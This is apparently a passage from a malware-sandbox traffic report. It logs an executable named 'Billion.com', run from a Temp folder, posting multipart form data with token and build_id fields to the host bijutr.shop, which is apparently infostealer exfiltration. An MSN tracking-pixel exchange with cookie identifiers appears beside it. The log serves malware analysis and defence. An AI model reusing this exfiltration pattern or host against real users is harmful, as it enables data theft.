                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:38 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                        ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                        Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                        Set-Cookie: MUID=302665E99E416E3C182470B69FCB6F6B; domain=.msn.com; expires=Sun, 18-Jan-2026 18:28:38 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                        Set-Cookie: SRM_M=302665E99E416E3C182470B69FCB6F6B; domain=c.msn.com; expires=Sun, 18-Jan-2026 18:28:38 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                        Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 31-Dec-2024 18:28:38 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                        Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 24-Dec-2024 18:38:38 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:38 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        40192.168.2.650051188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----WLFCTJWTJW4EU37QIE37
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 131557
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 4a 57 54 4a 57 34 45 55 33 37 51 49 45 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 4a 57 54 4a 57 34 45 55 33 37 51 49 45 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 46 43 54 4a 57 54 4a 57 34 45 55 33 37 51 49 45 33 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------WLFCTJWTJW4EU37QIE37Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WLFCTJWTJW4EU37QIE37Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WLFCTJWTJW4EU37QIE37Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:39 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        41192.168.2.650062188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----XLFCJEUKXLNYM7G4E3W4
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 6990993
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 58 4c 46 43 4a 45 55 4b 58 4c 4e 59 4d 37 47 34 45 33 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------XLFCJEUKXLNYM7G4E3W4Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XLFCJEUKXLNYM7G4E3W4Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
